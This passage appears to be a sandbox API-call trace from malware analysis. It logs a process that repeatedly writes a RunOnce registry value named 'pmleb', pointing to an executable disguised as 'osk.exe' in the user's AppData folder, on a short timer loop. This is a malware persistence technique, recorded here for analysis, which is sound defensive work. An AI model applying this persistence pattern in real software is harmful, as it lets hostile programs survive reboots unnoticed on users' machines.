lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.657] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.657] RegCloseKey (hKey=0x280) returned 0x0 [0101.657] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.657] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.657] SetTimer (hWnd=0x20280, nIDEvent=0x23a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a4 [0101.657] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.671] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.671] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.671] KillTimer (hWnd=0x20280, uIDEvent=0x23a4) returned 1 [0101.671] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.671] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.671] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.672] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.672] RegCloseKey (hKey=0x280) returned 0x0 [0101.672] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.672] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0101.672] SetTimer (hWnd=0x20280, nIDEvent=0x23a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a5 [0101.672] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.688] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.688] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.688] KillTimer (hWnd=0x20280, uIDEvent=0x23a5) returned 1 [0101.688] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.689] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.689] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.689] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.689] RegCloseKey (hKey=0x280) returned 0x0 [0101.689] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.689] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.689] SetTimer (hWnd=0x20280, nIDEvent=0x23a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a6 [0101.689] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.702] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.702] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.702] KillTimer (hWnd=0x20280, uIDEvent=0x23a6) returned 1 [0101.702] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.703] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.703] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.703] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.703] RegCloseKey (hKey=0x280) returned 0x0 [0101.704] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.704] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.704] SetTimer (hWnd=0x20280, nIDEvent=0x23a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a7 [0101.704] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.718] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.718] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.718] KillTimer (hWnd=0x20280, uIDEvent=0x23a7) returned 1 [0101.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.718] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.718] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.719] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.719] RegCloseKey (hKey=0x280) returned 0x0 [0101.719] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.719] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.719] SetTimer (hWnd=0x20280, nIDEvent=0x23a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a8 
[0101.719] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.735] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.735] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.735] KillTimer (hWnd=0x20280, uIDEvent=0x23a8) returned 1 [0101.736] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.736] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.736] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.736] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.737] RegCloseKey (hKey=0x280) returned 0x0 [0101.737] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.737] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.737] SetTimer (hWnd=0x20280, nIDEvent=0x23a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a9 [0101.737] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.780] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.780] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.780] KillTimer (hWnd=0x20280, uIDEvent=0x23a9) returned 1 [0101.781] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.781] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.781] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.781] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.781] RegCloseKey (hKey=0x280) returned 0x0 [0101.782] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.782] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.782] SetTimer (hWnd=0x20280, nIDEvent=0x23aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x23aa [0101.782] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.796] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.796] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.796] KillTimer (hWnd=0x20280, uIDEvent=0x23aa) returned 1 [0101.796] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.797] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.797] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.797] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.797] RegCloseKey (hKey=0x280) returned 0x0 [0101.797] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.797] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.797] SetTimer (hWnd=0x20280, nIDEvent=0x23ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ab [0101.797] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0101.811] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.811] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.811] KillTimer (hWnd=0x20280, uIDEvent=0x23ab) returned 1 [0101.812] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.812] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.812] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.812] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.813] RegCloseKey (hKey=0x280) returned 0x0 [0101.813] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.813] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.813] SetTimer (hWnd=0x20280, nIDEvent=0x23ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ac [0101.813] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.827] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.827] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.827] KillTimer (hWnd=0x20280, uIDEvent=0x23ac) returned 1 [0101.827] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.828] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.828] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.828] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.828] RegCloseKey (hKey=0x280) returned 0x0 [0101.828] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.829] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.829] SetTimer (hWnd=0x20280, nIDEvent=0x23ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ad [0101.829] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.842] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.842] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.843] KillTimer (hWnd=0x20280, uIDEvent=0x23ad) returned 1 [0101.843] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.843] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.843] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.844] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.844] RegCloseKey (hKey=0x280) returned 0x0 [0101.844] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.844] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.844] SetTimer (hWnd=0x20280, nIDEvent=0x23ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ae [0101.844] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.858] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.858] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.858] KillTimer (hWnd=0x20280, uIDEvent=0x23ae) returned 1 [0101.858] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.859] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.859] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.859] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.859] RegCloseKey (hKey=0x280) returned 0x0 [0101.860] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.860] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.860] SetTimer (hWnd=0x20280, nIDEvent=0x23af, uElapse=0xa, lpTimerFunc=0x0) returned 0x23af [0101.860] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.874] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.874] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.874] KillTimer (hWnd=0x20280, uIDEvent=0x23af) returned 1 [0101.875] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.875] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.875] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.875] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.876] RegCloseKey (hKey=0x280) returned 0x0 [0101.876] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.876] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.876] SetTimer (hWnd=0x20280, nIDEvent=0x23b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b0 [0101.876] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.889] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.889] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.889] KillTimer (hWnd=0x20280, uIDEvent=0x23b0) returned 1 [0101.890] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.890] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.890] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.890] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.891] RegCloseKey (hKey=0x280) returned 0x0 [0101.891] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.891] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.891] SetTimer (hWnd=0x20280, nIDEvent=0x23b1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b1 [0101.891] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.946] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.946] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.946] KillTimer (hWnd=0x20280, 
uIDEvent=0x23b1) returned 1 [0101.947] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.947] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.947] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.948] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.948] RegCloseKey (hKey=0x280) returned 0x0 [0101.948] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.948] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.948] SetTimer (hWnd=0x20280, nIDEvent=0x23b2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b2 [0101.948] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.951] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.951] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.952] KillTimer (hWnd=0x20280, uIDEvent=0x23b2) returned 1 [0101.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.952] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.952] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.953] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.953] RegCloseKey (hKey=0x280) returned 0x0 [0101.953] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.953] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.953] SetTimer (hWnd=0x20280, nIDEvent=0x23b3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b3 [0101.953] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.967] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.967] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.967] KillTimer (hWnd=0x20280, uIDEvent=0x23b3) returned 1 [0101.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.968] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.968] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.968] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.969] RegCloseKey (hKey=0x280) returned 0x0 [0101.969] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.969] SetTimer (hWnd=0x20280, nIDEvent=0x23b4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b4 [0101.969] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.983] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.983] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.983] KillTimer (hWnd=0x20280, uIDEvent=0x23b4) returned 1 [0101.983] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0101.984] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.984] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.984] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.984] RegCloseKey (hKey=0x280) returned 0x0 [0101.984] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.984] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.984] SetTimer (hWnd=0x20280, nIDEvent=0x23b5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b5 [0101.984] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.998] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.998] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.998] KillTimer (hWnd=0x20280, uIDEvent=0x23b5) returned 1 [0101.999] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.999] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.999] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.000] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.000] RegCloseKey (hKey=0x280) returned 0x0 
